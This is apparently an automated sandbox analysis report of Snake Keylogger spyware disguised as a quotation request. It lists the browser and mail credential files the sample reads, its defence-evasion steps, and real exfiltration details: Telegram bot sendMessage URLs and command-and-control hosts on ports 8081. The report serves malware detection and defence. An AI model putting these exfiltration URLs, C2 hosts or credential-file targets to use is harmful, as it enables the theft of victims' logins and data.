                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeQueries volume information: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeQueries volume information: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: NuDUTBObHpKADz.exe PID: 7636, type: MEMORYSTR
                Source: Yara matchFile source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara matchFile source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3829829868.00000000031DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: NuDUTBObHpKADz.exe PID: 7636, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: NuDUTBObHpKADz.exe PID: 7636, type: MEMORYSTR
                Source: Yara matchFile source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Windows Service
                1
                Windows Service
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory13
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                Scheduled Task/Job
                111
                Process Injection
                31
                Obfuscated Files or Information
                Security Account Manager11
                Security Software Discovery
                SMB/Windows Admin Shares1
                Email Collection
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                Scheduled Task/Job
                12
                Software Packing
                NTDS1
                Process Discovery
                Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets31
                Virtualization/Sandbox Evasion
                SSHKeylogging14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                File Deletion
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                Masquerading
                DCSync1
                System Network Configuration Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Modify Registry
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                Virtualization/Sandbox Evasion
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
                Process Injection
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560113 Sample: Request for Quotation MK FM... Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 52 reallyfreegeoip.org 2->52 54 api.telegram.org 2->54 56 2 other IPs or domains 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Sigma detected: Scheduled temp file as task from temp location 2->62 68 13 other signatures 2->68 8 Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe 7 2->8         started        12 NuDUTBObHpKADz.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 52->64 66 Uses the Telegram API (likely for C&C communication) 54->66 process4 file5 38 C:\Users\user\AppData\...38uDUTBObHpKADz.exe, PE32 8->38 dropped 40 C:\...40uDUTBObHpKADz.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp8B51.tmp, XML 8->42 dropped 44 Request for Quotat...4.11.21.bat.exe.log, ASCII 8->44 dropped 70 Adds a directory exclusion to Windows Defender 8->70 72 Injects a PE file into a foreign processes 8->72 14 powershell.exe 23 8->14         started        17 Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe 15 2 8->17         started        20 powershell.exe 23 8->20         started        26 2 other processes 8->26 74 Multi AV Scanner detection for dropped file 12->74 76 Machine Learning detection for dropped file 12->76 22 NuDUTBObHpKADz.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 78 Loading BitLocker PowerShell Module 14->78 28 conhost.exe 14->28         started        30 WmiPrvSE.exe 14->30         started        46 api.telegram.org 149.154.167.220, 443, 49821, 49834 TELEGRAMRU United Kingdom 17->46 48 checkip.dyndns.com 193.122.6.168, 49720, 49740, 49741 ORACLE-BMC-31898US United States 17->48 50 reallyfreegeoip.org 188.114.97.3, 443, 49727, 49734 CLOUDFLARENETUS European Union 17->50 32 conhost.exe 20->32         started        80 Tries to steal Mail credentials (via file / registry access) 22->80 82 Tries to harvest and steal browser information (history, passwords, etc) 22->82 34 conhost.exe 24->34         started        36 conhost.exe 26->36         started        signatures9 process10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe53%ReversingLabsWin32.Spyware.Snakekeylogger
                Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe53%ReversingLabsWin32.Spyware.Snakekeylogger
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                s-part-0017.t-0009.t-msedge.net
                13.107.246.45
                truefalse
                  high
                  reallyfreegeoip.org
                  188.114.97.3
                  truefalse
                    high
                    api.telegram.org
                    149.154.167.220
                    truefalse
                      high
                      checkip.dyndns.com
                      193.122.6.168
                      truefalse
                        high
                        checkip.dyndns.org
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.75false
                            high
                            http://checkip.dyndns.org/false
                              high
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2014:24:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                high
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2011:49:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.office.com/NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/chrome_newtabRequest for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.orgRequest for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoRequest for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://api.telegram.org/botRequest for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://checkip.dyndns.org/C5Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3841092416.00000000069A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20aRequest for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://tempuri.org/ianiDataSet2.xsdMRequest for Quotation MK FMHS.RFQ.24.11.21.bat.exe, NuDUTBObHpKADz.exe.0.drfalse
                                                    high
                                                    https://www.office.com/lBRequest for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003278000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002A0A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://checkip.dyndns.orgRequest for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://chrome.google.com/webstore?hl=enNuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000029DE000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000029CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.ecosia.org/newtab/Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://varders.kozow.com:8081Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://tempuri.org/ianiDataSet.xsdRequest for Quotation MK FMHS.RFQ.24.11.21.bat.exe, NuDUTBObHpKADz.exe.0.drfalse
                                                                      high
                                                                      http://aborters.duckdns.org:8081Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://ac.ecosia.org/autocomplete?q=Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://tempuri.org/ianiDataSet1.xsdRequest for Quotation MK FMHS.RFQ.24.11.21.bat.exe, NuDUTBObHpKADz.exe.0.drfalse
                                                                            high
                                                                            https://www.office.com/0Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.000000000326E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
